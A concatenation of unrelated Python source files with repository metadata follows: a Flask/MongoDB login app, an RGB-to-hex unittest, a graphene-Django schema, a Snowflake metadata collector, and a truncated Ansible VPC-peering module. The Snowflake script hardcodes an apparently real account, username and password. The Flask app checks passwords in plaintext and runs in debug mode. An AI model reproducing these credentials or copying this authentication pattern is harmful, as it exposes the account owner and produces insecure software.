nome = session['nome']
return render_template(
'index.html',
log = log,
nome = nome,
)
@app.route('/registrar')
def registrar():
return render_template('registrar.html')
@app.route('/criar', methods = ['POST','GET'])
def criar():
if request.method == 'POST':
usuario = mongo.db.usuario # Cria uma Tabela "usuario" dentro do #TESTE_LOGIN
add = {}
for parametro in request.form:
add[parametro] = request.form[parametro]
if usuario.find_one({'nome':add['nome']}) is None:
if add['senha'] == add['senha_confirmar']:
imagem = request.files['imagem']
mongo.save_file(imagem.filename,imagem)
add['imagem'] = imagem.filename
# Salvar informações
usuario.insert(add)
else:
flash('Confirmação de senha inválida','danger')
return redirect(url_for('registrar'))
else:
flash('Já existe este usuário','danger')
return redirect(url_for('registrar'))
return redirect(url_for('login'))
@app.route('/login', methods = ['POST','GET'])
def login():
if request.method == 'POST':
usuario = mongo.db.usuario
if usuario.find_one({'nome':request.form['nome']}) is None:
flash('Usuário não cadastrado','danger')
else:
usuario_nome = usuario.find_one({'nome':request.form['nome']})
if usuario_nome['senha'] == request.form['senha']:
session['log'] = True
session['nome'] = usuario_nome['nome']
session['imagem_perfil'] = usuario_nome['imagem']
flash('LOGADO','success')
return redirect(url_for('index'))
else:
flash('Senha Incorreta','danger')
return render_template('login.html')
@app.route('/logout')
def logout():
#session.clear() # Remove tudo
session.pop('log') # Remove um
return render_template('index.html')
@app.route('/file/<filename>')
def file(filename):
return mongo.send_file(filename)
if __name__ == '__main__':
app.run(debug=True)
|
[
"miguel.junior.mat@hotmail.com"
] |
miguel.junior.mat@hotmail.com
|
4b686971265956b356d5ecee5f3e6524d571bd1b
|
e3f67efa1ae966fbdf95666354387230d4eb0f03
|
/test_rgb_to_hex.py
|
ed74b0121611760f91cfb9f4dbe45a32e5cfa54f
|
[] |
no_license
|
strikervc/RGB-to-HEX-Kata
|
f6ebda83c0e0198f9854d61da5e33f5d22f0504a
|
fcc4f10b7f1b7814d0cc04fbd3e9f061dab0f20a
|
refs/heads/master
| 2023-02-02T15:48:17.002121
| 2020-12-18T23:35:04
| 2020-12-18T23:35:04
| 323,187,104
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 563
|
py
|
import unittest
from rgb_to_hex import converter
class testCases (unittest.TestCase):
def test_rgb_to_hex_01(self):
value = converter()
result = "6f6f6f"
self.assertEqual(result, value.rgb_to_hex((111, 111, 111)))
def test_rgb_to_hex_02(self):
value = converter()
result = "de6fde"
self.assertEqual(result, value.rgb_to_hex((222, 111, 222)))
def test_rgb_to_hex_03(self):
value = converter()
result = "7a6f7a"
self.assertEqual(result, value.rgb_to_hex((122, 111, 122)))
|
[
"victor334_@hotmail.com"
] |
victor334_@hotmail.com
|
cdd308eba5962df734d1f76bbec670dd320e7cdd
|
13a024e00cab7b0232800151ea7a09f207ef66c9
|
/src/skills/schema.py
|
55703cb472f32d0a5808040d9655fc866786546f
|
[] |
no_license
|
angieellis/tshape
|
104198c1826b5d762a83c3c4e9f2ffe3ea1b57cd
|
d15a655ed624877e03b9d47eab92e369eb1aefd8
|
refs/heads/master
| 2021-01-23T13:59:00.097090
| 2016-11-24T05:08:22
| 2016-11-24T05:08:22
| 55,925,470
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,107
|
py
|
from django_filters import FilterSet
from graphene_django import DjangoObjectType
import graphene
from profiles.models import Profile as ProfileModel
from skills.models import Skill as SkillModel
from skillsets.models import Skillset as SkillsetModel
from tshape.utils import assign_attrs
from users.models import User as UserModel
__all__ = ['Skill', 'SkillFilter', 'SkillQuery',
'CreateSkill', 'UpdateSkill', 'DeleteSkill']
class Skill(DjangoObjectType):
class Meta:
model = SkillModel
filter_fields = ['id', 'name', 'description',
'verified', 'weight', 'skillset_id']
filter_order_by = ['id', 'name', 'description',
'verified', 'weight', 'skillset_id']
class SkillFilter(FilterSet):
class Meta:
model = SkillModel
fields = ['id', 'name', 'description',
'verified', 'weight', 'skillset_id']
class SkillQuery(graphene.AbstractType):
skill = graphene.Field(Skill)
skills = graphene.List(Skill)
@graphene.resolve_only_args
def resolve_skill(self):
return SkillModel.objects.first()
@graphene.resolve_only_args
def resolve_skills(self):
return SkillModel.objects.all()
# def create_skill(name, description, skillset_id):
# new_skill = Skill(
# name=name,
# description=description,
# skillset_id=skillset_id
# )
# new_skill.save()
# return new_skill
class CreateSkill(graphene.Mutation):
class Input:
name = graphene.String(required=True)
description = graphene.String()
verified = graphene.Boolean()
weight = graphene.Int()
skillset_id = graphene.Int(required=True)
skill = graphene.Field(Skill)
def mutate(self, args, context, info):
name = args.get('name')
description = args.get('description')
skillset_id = args.get('skillset_id')
new_skill = SkillModel(name, description, skillset_id)
new_skill.save()
return CreateSkill(skill=new_skill)
class UpdateSkill(graphene.Mutation):
class Input:
id = graphene.Int(required=True)
name = graphene.String()
description = graphene.String()
verified = graphene.Boolean()
weight = graphene.Int()
skillset_id = graphene.Int()
skill = graphene.Field(Skill)
def mutate(self, args, context, info):
id = args.get('id')
skill = SkillModel.objects.get(pk=id)
keys = ['name', 'description', 'verified', 'weight', 'skillset_id']
attr_map = {
k: v for k, v in args.items()
if k in keys and v is not None}
skill = assign_attrs(attr_map, skill)
skill.save()
return UpdateSkill(skill=skill)
class DeleteSkill(graphene.Mutation):
class Input:
id = graphene.Int(required=True)
skill = graphene.Field(Skill)
def mutate(self, args, context, info):
id = args.get('id')
skill = SkillModel.objects.get(pk=id)
skill.delete()
return DeleteSkill(skill=skill)
|
[
"angiegrace84@gmail.com"
] |
angiegrace84@gmail.com
|
0f85274a33880807fc975d50c64d8e2e3d605d2c
|
58b7a0570184e5a38beeddaa7dc7dfd959213103
|
/snowflake/db_level_metadata/db_meta_collection.py
|
d5a8521191e062a9e187df46ca07a20ecdc8151d
|
[] |
no_license
|
sagarch1234/snowflake
|
89bd1a6d52f2f1fb25b6673080572991375995e4
|
644b52275a122ebbaf4ec51a0f4184b993f964e7
|
refs/heads/master
| 2023-03-06T14:04:40.646357
| 2021-02-11T14:17:21
| 2021-02-11T14:17:21
| 337,696,236
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,071
|
py
|
import sys
import os
sys.path.insert(1, '/snowflake-backend/snowflake/instance_connector')
import snowflake.connector
import constants
from queries_and_tables import queries_tables_list
from connection import SnowflakeConnector
from get_data import GetCustomerData
from load_data import LoadData
from associate_data import AssociateData
from snowflake.sqlalchemy import URL
from sqlalchemy import create_engine
import pandas as pd
class CollectMetaData():
def __init__(self, account, user, password, user_id, company_id, event, instance_id):
#other arguments for associate data.
self.instance_id = instance_id
self.event = event
self.company_id = company_id
self.user_id = user_id
#connect to customer snowflake instance
self.customer_engine = create_engine(URL(account = account, user = user, password = password, role='ACCOUNTADMIN'))
self.customer_connector = self.customer_engine.connect()
#connect to SFO's snowflake instance
self.sfo_connector = SnowflakeConnector(user=os.environ.get('SNOWFLAKE_ACCOUNT_USER'), password=os.environ.get('SNOWFLAKE_ACCOUNT_PASSWORD'), account=os.environ.get('SNOWFLAKE_ACCOUNT'), database_name=os.environ.get('SNOWFLAKE_DATABASE_NAME'), schema_name=os.environ.get('SCHEMA_NAME_AUDITS'), role=os.environ.get('ACCOUNT_ROLE'), warehouse=os.environ.get('ACCOUNT_WAREHOUSE'))
self.sfo_engine = self.sfo_connector.get_engine()
self.sfo_con = self.sfo_connector.connect_snowflake_instance()
#get data object
self.get_data = GetCustomerData(self.customer_engine)
#associate data object
self.associate = AssociateData(instance_id=self.instance_id, user_id=self.user_id, event=self.event, company_id=self.company_id)
#load data
self.load_data = LoadData(engine=self.sfo_engine, connection=self.sfo_con)
#df of customer's databases
self.databases = df = pd.read_sql_query("show databases;", self.customer_engine)
def collect_process_dump(self, sql, table_name, index_label):
final_df = pd.DataFrame()
for database in self.databases['name']:
#get_data
customer_df = self.get_data.get_data(sql, database)
final_df = final_df.append(customer_df)
#associate_data
associated_df = self.associate.associate_data(dataframe=final_df)
#load_data
load_data = self.load_data.dump_data(table_name=table_name, dataframe=associated_df, index_label=index_label)
obj = CollectMetaData(account='lt90919.us-central1.gcp', user='shivkant', password='Shiva@123!!*', user_id=2, company_id=4, event="AUDITS", instance_id=4)
# obj1 = obj.collect_process_dump(sql=f'SELECT * FROM SNOWFLAKE.INFORMATION_SCHEMA.APPLICABLE_ROLES;', table_name='info_schema_applicable_roles')
for queries_tables in queries_tables_list:
print(">>>>>>>>>>",queries_tables)
obj1 = obj.collect_process_dump(sql=queries_tables[0], table_name=queries_tables[1], index_label=queries_tables[2])
|
[
"jpatel99967@gmail.com"
] |
jpatel99967@gmail.com
|
729a1afce0efb407c5472d53041bc3864d6c1a96
|
1683174856297e64b2330a03fc876d0328509d03
|
/playbooks/library/ec2_vpc_peer.py
|
a787ba96042f3e2578e8816da600c23bf6b8197e
|
[] |
no_license
|
missnebun/ansible-examples
|
352e146dbf7bcf7d3313cb1e26d7852c923e405e
|
3525cf6c1dce79b05b83f391372ce5c5e89a4289
|
refs/heads/master
| 2020-12-26T10:40:51.616774
| 2016-08-08T23:02:19
| 2016-08-08T23:02:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 49,814
|
py
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
module: ec2_vpc_peer
short_description: create, delete, accept, and reject VPC peering connections between two VPCs.
description:
- Read the AWS documentation for VPC Peering Connections
U(http://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/vpc-peering.html)
version_added: "2.1"
author: Allen Sanabria(@linuxdynasty)
extends_documentation_fragment: aws
requirements: [boto3, botocore]
options:
accept_peer:
description:
- If set to yes, the newly created peering connection will be accepted.
required: false
accept_with_profile:
description:
- The boto3 profile to use when you are auto accepting a cross account peer.
required: false
accepter_routes:
description:
- List of route table ids. These route tables will be updated with the
- CIDR block of the vpc_id using the vpc_peering_id that is generated when the peer is created.
required: false
requester_routes:
description:
- List of route table ids. These route tables will be updated with the
- CIDR block of the vpc_peer_id using the vpc_peering_id that is generated when the peer is created.
required: false
resource_tags:
description:
- Dictionary of Tags to apply to the newly created peer.
required: false
vpc_id:
description:
- VPC id of the requesting VPC.
required: false
peer_vpc_id:
description:
- VPC id of the accepting VPC.
required: false
peer_owner_id:
description:
- The AWS account number for cross account peering.
required: false
state:
description:
- Create, delete, accept, reject a peering connection.
required: false
default: present
choices: ['present', 'absent', 'accept', 'reject']
'''
EXAMPLES = '''
# Complete example to create and accept a local peering connection and auto accept.
- name: Create local account VPC peering Connection and auto accept
ec2_vpc_peer:
region: us-west-2
vpc_id: vpc-12345678
peer_vpc_id: vpc-87654321
state: present
accept_peer: yes
resource_tags:
- Name: new_peer
- Env: development
register: vpc_peer
# Complete example to create and accept a local peering connection and auto
# accept as well as add routes to the requester CIDR (The CIDR block of the vpc_id)
# using the newly created peering connection id.
- name: Create local account VPC peering Connection and auto accept and add routes
ec2_vpc_peer:
region: us-west-2
vpc_id: vpc-12345678
peer_vpc_id: vpc-87654321
state: present
accept_peer: yes
requester_routes:
- rtb-12345678
- rtb-98765432
resource_tags:
- Name: new_peer
- Env: development
register: vpc_peer
# Complete example to create and accept a local peering connection and auto
# accept as well as add routes to the accepter CIDR (The CIDR block of the vpc_peer_id)
# using the newly created peering connection id.
- name: Create local account VPC peering Connection and auto accept and add routes
ec2_vpc_peer:
region: us-west-2
vpc_id: vpc-12345678
peer_vpc_id: vpc-87654321
state: present
accept_peer: yes
accepter_routes:
- rtb-12345678
- rtb-98765432
resource_tags:
- Name: new_peer
- Env: development
register: vpc_peer
# Complete example to create and accept a cross account peering connection and auto accept.
# Boto3 profile for the other account must exist in ~/.aws/credentials
- name: Create cross account VPC peering Connection and auto accept
ec2_vpc_peer:
region: us-west-2
vpc_id: vpc-12345678
peer_vpc_id: vpc-87654321
state: present
accept_with_profile: boto3_profile_goes_here
peer_owner_id: 12345678910
resource_tags:
- Name: new_peer
- Env: development
register: vpc_peer
# Complete example to delete a local account peering connection.
# Boto3 profile for the other account must exist in ~/.aws/credentials
- name: Create cross account VPC peering Connection and auto accept
ec2_vpc_peer:
region: us-west-2
vpc_id: vpc-12345678
peer_vpc_id: vpc-87654321
state: present
resource_tags:
- Name: new_peer
- Env: development
register: vpc_peer
- name: delete a VPC peering Connection
ec2_vpc_peer:
region: us-west-2
peering_id: "{{ vpc_peer.vpc_peering_connection_id }}"
state: absent
register: vpc_peer
# Complete example to delete a cross account peering connection.
# Boto3 profile for the other account must exist in ~/.aws/credentials
- name: Create cross account VPC peering Connection and auto accept
ec2_vpc_peer:
region: us-west-2
vpc_id: vpc-12345678
peer_vpc_id: vpc-87654321
state: present
accept_with_profile: boto3_profile_goes_here
peer_owner_id: 12345678910
resource_tags:
- Name: new_peer
- Env: development
register: vpc_peer
- name: delete a cross account VPC peering Connection
ec2_vpc_peer:
region: us-west-2
peering_id: "{{ vpc_peer.vpc_peering_connection_id }}"
state: absent
profile: boto3_profile_goes_here
register: vpc_peer
# Complete example to reject a local account peering connection.
# Boto3 profile for the other account must exist in ~/.aws/credentials
- name: Create VPC peering Connection.
ec2_vpc_peer:
region: us-west-2
vpc_id: vpc-12345678
peer_vpc_id: vpc-87654321
state: present
resource_tags:
- Name: new_peer
- Env: development
register: vpc_peer
- name: Reject a VPC peering Connection
ec2_vpc_peer:
region: us-west-2
peering_id: "{{ vpc_peer.vpc_peering_connection_id }}"
state: reject
register: vpc_peer
# Complete example to reject a cross account peering connection.
# Boto3 profile for the other account must exist in ~/.aws/credentials
- name: Create cross account VPC peering Connection.
ec2_vpc_peer:
region: us-west-2
vpc_id: vpc-12345678
peer_vpc_id: vpc-87654321
state: present
peer_owner_id: 12345678910
resource_tags:
- Name: new_peer
- Env: development
register: vpc_peer
- name: Reject a cross account VPC peering Connection
ec2_vpc_peer:
region: us-west-2
peering_id: "{{ vpc_peer.vpc_peering_connection_id }}"
state: reject
profile: boto3_profile_goes_here
register: vpc_peer
'''
RETURN = '''
success:
description: Returns true if all succeeded and false if it failed.
returned: In all cases.
type: bool
sample: true
changed:
description: Returns true if action made a changed and false if it didn't.
returned: In all cases.
type: bool
sample: true
status:
description: Dictionary containing the message and code.
returned: Success.
type: dictionary
sample:
{
"message": "Active",
"code": "active"
}
tags:
description: List of dictionaries containing the key, val of each tag.
returned: Success.
type: list
sample:
[
{
"value": "web",
"key": "service"
}
]
accepter_vpc_info:
description: Dictionary containing the owner_id, vpc_id, and cidr_block.
returned: Success.
type: dictionary
sample:
{
"owner_id": "12345678910",
"vpc_id": "vpc-12345678",
"cidr_block": "172.31.0.0/16"
}
vpc_peering_connection_id:
description: The peering connection id.
returned: Success.
type: string
sample: pcx-12345678
requester_vpc_info:
description: Dictionary containing the owner_id, vpc_id, and cidr_block.
returned: Success.
type: dictionary
sample:
{
"owner_id": "12345678910",
"vpc_id": "vpc-12345678",
"cidr_block": "10.100.0.0/16"
}
'''
try:
import botocore
import boto3
import boto3.session
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
import datetime
import re
def create_client_with_profile(profile_name, region, resource_name='ec2'):
""" Create a new boto3 client with a boto3 profile in ~/.aws/credentials
Args:
profile_name (str): The name of the profile that you have set in your
~/.aws/credentials profile.
region (str): The aws region you want to connect to.
resource_name (str): Valid aws resource.
default=ec2
Basic Usage:
>>> client, err_msg = create_client_with_profile('lab01', 'us-west-2')
Returns:
Tuple (botocore.client.EC2, str)
"""
client = None
err_msg = ''
try:
session = (
boto3.session.Session(
profile_name=profile_name, region_name=region
)
)
client = session.client(resource_name)
except Exception as e:
err_msg = str(e)
return client, err_msg
def convert_to_lower(data):
"""Convert all uppercase keys in dict with lowercase_
Args:
data (dict): Dictionary with keys that have upper cases in them
Example.. NatGatewayAddresses == nat_gateway_addresses
if a val is of type datetime.datetime, it will be converted to
the ISO 8601
Basic Usage:
>>> test = {'NatGatewaysAddresses': []}
>>> test = convert_to_lower(test)
{
'nat_gateways_addresses': []
}
Returns:
Dictionary
"""
results = dict()
if isinstance(data, dict):
for key, val in data.items():
key = re.sub('([A-Z]{1})', r'_\1', key).lower()
if key[0] == '_':
key = key[1:]
if isinstance(val, datetime.datetime):
results[key] = val.isoformat()
elif isinstance(val, dict):
results[key] = convert_to_lower(val)
elif isinstance(val, list):
converted = list()
for item in val:
converted.append(convert_to_lower(item))
results[key] = converted
else:
results[key] = val
return results
def find_tags(client, resource_id, check_mode=False):
"""Retrieve all tags for an Amazon resource id
Args:
client (botocore.client.EC2): Boto3 client
resource_id (str): The Amazon resource id.
Kwargs:
check_mode (bool): This will pass DryRun as one of the parameters to the aws api.
default=False
Basic Usage:
>>> client = boto3.client('ec2')
>>> resource_id = 'rtb-123456'
>>> success, msg, tags = find_tags(client, resource_id)
(
True,
'',
[
{
u'Value': 'Test-Private-Zone-A',
u'Key': 'Name'
}
]
)
Returns:
Tuple (bool, str, list)
"""
success = False
err_msg = ''
current_tags = list()
search_params = {
'Filters': [
{
'Name': 'resource-id',
'Values': [resource_id]
}
],
'DryRun': check_mode
}
try:
current_tags = client.describe_tags(**search_params)['Tags']
success = True
if current_tags:
for i in range(len(current_tags)):
current_tags[i].pop('ResourceType')
current_tags[i].pop('ResourceId')
except botocore.exceptions.ClientError, e:
if e.response['Error']['Code'] == 'DryRunOperation':
success = True
err_msg = e.message
else:
err_msg = str(e)
return success, err_msg, current_tags
def describe_peering_connections(client, vpc_id=None, vpc_peer_id=None,
vpc_peering_id=None, status_codes=None,
check_mode=False):
"""Retrieve peering connection info by peering_id or by searching by requestor and accepter.
Args:
client (botocore.client.EC2): Boto3 client
Kwargs:
vpc_id (str): The requestor vpc_id.
vpc_peer_id (str): The accepter vpc_id.
vpc_peering_id (str): The vpc peering connection id.
status_codes (list): The codes to filter on.
valid status codes = [
pending-acceptance, failed, expired, provisioning,
active, deleted, rejected
]
check_mode (bool): This will pass DryRun as one of the parameters to the aws api.
default=False
Basic Usage:
>>> client = boto3.client('ec2')
>>> vpc_id='vpc-d18571b5'
>>> vpc_peer_id='vpc-68da9d0d'
>>> describe_peering_connections(client, vpc_id, vpc_peer_id)
[
True,
"",
[
{
"Status": {
"Message": "Active",
"Code": "active"
},
"Tags": [
{
"Value": "env",
"Key": "Management"
},
{
"Value": "Management to Production",
"Key": "Name"
}
],
"AccepterVpcInfo": {
"OwnerId": "12345678910",
"VpcId": "vpc-123456789",
"CidrBlock": "172.31.0.0/16"
},
"VpcPeeringConnectionId": "pcx-12345678",
"RequesterVpcInfo": {
"OwnerId": "12345678910",
"VpcId": "vpc-12345678",
"CidrBlock": "172.32.0.0/16"
}
}
]
]
Returns:
Tuple (bool, str, list)
"""
success = False
err_msg = ''
params = {
'DryRun': check_mode
}
result = list()
if vpc_id and vpc_peer_id:
params['Filters'] = [
{
'Name': 'requester-vpc-info.vpc-id',
'Values': [vpc_id],
},
{
'Name': 'accepter-vpc-info.vpc-id',
'Values': [vpc_peer_id],
}
]
if status_codes:
params['Filters'].append(
{
'Name': 'status-code',
'Values': status_codes
}
)
elif vpc_peering_id:
params['VpcPeeringConnectionIds'] = [vpc_peering_id]
if status_codes:
params['Filters'] = [
{
'Name': 'status-code',
'Values': status_codes
}
]
try:
result = (
client.describe_vpc_peering_connections(**params)
['VpcPeeringConnections']
)
success = True
except botocore.exceptions.ClientError, e:
if e.response['Error']['Code'] == 'DryRunOperation':
success = True
err_msg = e.message
else:
err_msg = str(e)
return success, err_msg, result
def is_active(peering_conn):
return peering_conn['status']['code'] == 'active'
def is_deleted(peering_conn):
return peering_conn['status']['code'] == 'deleted'
def is_expired(peering_conn):
return peering_conn['status']['code'] == 'expired'
def is_failed(peering_conn):
return peering_conn['status']['code'] == 'failed'
def is_initiating_request(peering_conn):
return peering_conn['status']['code'] == 'initiating-request'
def is_pending(peering_conn):
return peering_conn['status']['code'] == 'pending-acceptance'
def is_provisioning(peering_conn):
return peering_conn['status']['code'] == 'provisioning'
def is_rejected(peering_conn):
return peering_conn['status']['code'] == 'rejected'
def make_tags_in_proper_format(tags):
"""Take a list of aws tags and convert them into a list of dictionaries.
Where the key is the actual key and not Key.
Args:
tags (list): The tags you want applied.
Basic Usage:
>>> tags = [{u'Key': 'env', u'Value': 'development'}]
>>> make_tags_in_proper_format(tags)
[
{
"env": "development",
}
]
Returns:
List
"""
formatted_tags = list()
for tag in tags:
formatted_tags.append(
{
tag.get('Key'): tag.get('Value')
}
)
return formatted_tags
def convert_list_of_tags(tags):
"""Convert a list of AWS Tag dictionaries into a dictionary.
Args:
tags (list): The tags you want applied.
Basic Usage:
>>> tags = [{u'Key': 'env', u'Value': 'development'}]
>>> convert_list_of_tags(tags)
{
"env": "development",
}
Returns:
Dict
"""
converted_tags = dict()
for tag in tags:
tag = convert_to_lower(tag)
converted_tags[tag.get('key')] = tag.get('value')
return converted_tags
def make_tags_in_aws_format(tags):
"""Take a dictionary of tags and convert them into the AWS Tags format.
Args:
tags (dict): The tags you want applied.
Basic Usage:
>>> tags = {'env': 'development', 'service': 'web'}
>>> make_tags_in_aws_format(tags)
[
{
"Value": "web",
"Key": "service"
},
{
"Value": "development",
"key": "env"
}
]
Returns:
List
"""
formatted_tags = list()
for key, val in tags.items():
formatted_tags.append({
'Key': key,
'Value': val
})
return formatted_tags
def tags_action(client, resource_id, tags, action='create', check_mode=False):
"""Create or Delete tags for an Amazon resource id.
Args:
client (botocore.client.EC2): Boto3 client.
resource_id (str): The Amazon resource id.
tags (list): List of dictionaries.
examples.. [{Name: "", Values: [""]}]
Kwargs:
action (str): The action to perform.
valid actions == create and delete
default=create
check_mode (bool): This will pass DryRun as one of the parameters to the aws api.
default=False
Basic Usage:
>>> client = boto3.client('ec2')
>>> resource_id = 'pcx-123345678'
>>> tags = [{'Name': 'env', 'Values': ['Development']}]
>>> update_tags(client, resource_id, tags)
[True, '']
Returns:
List (bool, str)
"""
success = False
err_msg = ""
params = {
'Resources': [resource_id],
'Tags': tags,
'DryRun': check_mode
}
try:
if action == 'create':
client.create_tags(**params)
success = True
elif action == 'delete':
client.delete_tags(**params)
success = True
else:
err_msg = 'Invalid action {0}'.format(action)
except botocore.exceptions.ClientError, e:
if e.response['Error']['Code'] == 'DryRunOperation':
success = True
err_msg = e.message
else:
err_msg = str(e)
return success, err_msg
def recreate_tags_from_list(list_of_tags):
"""Recreate tags from a list of tuples into the Amazon Tag format.
Args:
list_of_tags (list): List of tuples.
Basic Usage:
>>> list_of_tags = [('Env', 'Development')]
>>> recreate_tags_from_list(list_of_tags)
[
{
"Value": "Development",
"Key": "Env"
}
]
Returns:
List
"""
tags = list()
i = 0
list_of_tags = list_of_tags
for i in range(len(list_of_tags)):
key_name = list_of_tags[i][0]
key_val = list_of_tags[i][1]
tags.append(
{
'Key': key_name,
'Value': key_val
}
)
return tags
def update_routes(client, vpc_peering_id, cidr, route_table_ids,
check_mode=False):
"""Update routes in multiple route tables.
Args:
client (botocore.client.EC2): Boto3 client.
vpc_peering_id (str): The vpc peering connection id.
cidr (str): The dest cidr block.
example.. 0.0.0.0/0
route_table_ids (list): List of route table ids.
Kwargs:
check_mode (bool): This will pass DryRun as one of the parameters to the aws api.
default=False
Basic Usage:
>>> client = boto3.client('ec2')
>>> vpc_peering_id = 'vpx-1234567'
>>> cidr = '0.0.0.0/0'
>>> route_table_ids = ['rtb-1234567', 'rtb-7654321']
[
True,
True,
''
]
Returns:
Tuple (bool, bool, str)
"""
success = False
changed = False
err_msg = ''
for route_table_id in route_table_ids:
params = {
'RouteTableId': route_table_id,
'DestinationCidrBlock': cidr,
'VpcPeeringConnectionId': vpc_peering_id,
'DryRun': check_mode,
}
try:
completed = client.create_route(**params)
if completed.get('Return') == True:
success, changed = True, True
except botocore.exceptions.ClientError, e:
err_msg = str(e)
if e.response['Error']['Code'] == 'DryRunOperation':
success = True
err_msg = e.message
elif re.search('RouteAlreadyExists', err_msg):
success = True
return success, changed, err_msg
def pre_update_routes(client, peer_info, accepter_routes=None,
requester_routes=None, check_mode=False):
"""Does the pre work before updating a route.
Args:
client (botocore.client.EC2): Boto3 client.
peer_info (dict): This contains the output of describe_peering_connections
Kwargs:
accepter_routes (list): list of route table ids that you want
to add routes to the cidr that belongs to the peer of the newly
created peering_connection
default=None
requester_routes (list): list of route table ids that you want
to add routes to the cidr that belongs to the vpc that is
initiating the creation of the newly created peering_connection
default=None
check_mode (bool): This will pass DryRun as one of the parameters to the aws api.
default=False
Basic Usage:
>>> client = boto3.client('ec2')
>>> _, _, vpc_peer_info = describe_peering_connections(
client, vpc_peering_id='vpx-1234567'
)
>>> accepter_routes = ['rtb-1234567', 'rtb-7654321']
>>> pre_update_routes(client, vpc_peer_info[0], accepter_routes)
[
True,
True,
''
]
Returns:
Tuple (bool, bool, str)
"""
success = False
changed = False
err_msg = 'Need to pass either accepter_routes or requester_routes.'
vpc_peering_id = peer_info['vpc_peering_connection_id']
if accepter_routes and peer_info['accepter_vpc_info'].get('cidr_block', None):
routes = accepter_routes
cidr = peer_info['accepter_vpc_info']['cidr_block']
success, changed, err_msg = (
update_routes(client, vpc_peering_id, cidr, routes)
)
if requester_routes and peer_info['requester_vpc_info'].get('cidr_block', None):
routes = requester_routes
cidr = peer_info['requester_vpc_info']['cidr_block']
success, changed, err_msg = (
update_routes(client, vpc_peering_id, cidr, routes)
)
return success, changed, err_msg
def update_tags(client, resource_id, tags, check_mode=False):
"""Update tags for an amazon resource. This will delete any tag that is
not part of the tags parameter and update|create.
Args:
resource_id (str): The Amazon resource id.
tags (list): List of dictionaries.
examples.. [{Name: "", Values: [""]}]
Kwargs:
check_mode (bool): This will pass DryRun as one of the parameters to the aws api.
default=False
Basic Usage:
>>> client = boto3.client('ec2')
>>> resource_id = 'pcx-123345678'
>>> tags = [{'Name': 'env', 'Values': ['Development']}]
>>> update_tags(client, resource_id, tags)
[True, '']
Return:
Tuple (bool, str)
"""
success = False
err_msg = ''
find_success, find_err, current_tags = (
find_tags(client, resource_id, check_mode=check_mode)
)
if find_success:
if current_tags:
current_tags_set = (
set(
reduce(
lambda x, y: x + y,
[x.items() for x in make_tags_in_proper_format(current_tags)]
)
)
)
new_tags_set = (
set(
reduce(
lambda x, y: x + y,
[x.items() for x in make_tags_in_proper_format(tags)]
)
)
)
tags_to_delete = list(current_tags_set.difference(new_tags_set))
tags_to_update = list(new_tags_set.difference(current_tags_set))
if tags_to_delete:
tags_to_delete = recreate_tags_from_list(tags_to_delete)
delete_success, delete_msg = (
tags_action(
client, resource_id, tags_to_delete, action='delete',
check_mode=False
)
)
if not delete_success:
return delete_success, delete_msg
if tags_to_update:
tags = recreate_tags_from_list(tags_to_update)
if not tags:
return delete_success, delete_msg
if tags:
create_success, create_msg = (
tags_action(
client, resource_id, tags, action='create',
check_mode=False
)
)
return create_success, create_msg
return success, err_msg
def runner(client, state, params):
"""Generic function that will handle the calls to create, delete, reject and accept.
This function should not be called directly, except by the run function.
Args:
client (botocore.client.EC2): Boto3 client.
state (str): valid states. [accept, reject, absent, present].
params (dict): Params contains the parameters to perform the aws request.
Kwargs:
boto3_profile (str): The name of the boto3 profile to use when
making a cross account request.
default=None
Basic Usage:
>>> client = boto3.client('ec2')
>>> state = 'accept'
>>> vpc_peering_id = 'pcx-12345'
>>> params = {'VpcPeeringConnectionId': vpc_peering_id}
>>> runner(client, state, params)
[
True,
False,
"",
{
"status": {
"message": "Active",
"code": "active"
},
"tags": [
{
"value": "web",
"key": "service"
},
{
"value": "Shaolin Allen",
"key": "Name"
},
{
"value": "development",
"key": "env"
}
],
"accepter_vpc_info": {
"owner_id": "12345678910",
"vpc_id": "vpc-12345678",
"cidr_block": "172.31.0.0/16"
},
"vpc_peering_connection_id": "pcx-12345678",
"requester_vpc_info": {
"owner_id": "12345678910",
"vpc_id": "vpc-12345678",
"cidr_block": "10.100.0.0/16"
}
}
]
Return:
Tuple (bool, bool, str, dict)
"""
success = False
changed = False
err_msg = ''
result = dict()
invocations = {
'accept': client.accept_vpc_peering_connection,
'reject': client.reject_vpc_peering_connection,
'absent': client.delete_vpc_peering_connection,
'present': client.create_vpc_peering_connection,
}
if state not in ['accept', 'reject', 'absent', 'present']:
return success, changed, err_msg, result
try:
result = invocations[state](**params)
response = result.pop('ResponseMetadata')
if result.get('VpcPeeringConnection', {}):
result = result.pop('VpcPeeringConnection')
if response['HTTPStatusCode'] == 200:
changed = True
success = True
else:
err_msg = "Failure occured, please check aws console"
result = convert_to_lower(result)
except botocore.exceptions.ClientError, e:
if e.response['Error']['Code'] == 'DryRunOperation':
success = True
err_msg = e.message
else:
err_msg = str(e)
return success, changed, err_msg, result
def run(client, vpc_peering_id, state, check_mode=False):
"""Generic function for ensuring the various states for a peering connection.
This function is called by create, accept, reject, and delete.
Args:
client (botocore.client.EC2): Boto3 client.
vpc_peering_id (str): The vpc peering connection id.
state (str): valid states. [accept, reject, absent, present].
Kwargs:
check_mode (bool): This will pass DryRun as one of the parameters to the aws api.
default=False
Basic Usage:
>>> client = boto3.client('ec2')
>>> state = 'accept'
>>> vpc_peering_id = 'pcx-12345'
>>> run(client, state, params)
[
True,
False,
"",
{
"status": {
"message": "Active",
"code": "active"
},
"tags": [
{
"value": "web",
"key": "service"
},
{
"value": "Shaolin Allen",
"key": "Name"
},
{
"value": "development",
"key": "env"
}
],
"accepter_vpc_info": {
"owner_id": "12345678910",
"vpc_id": "vpc-12345678",
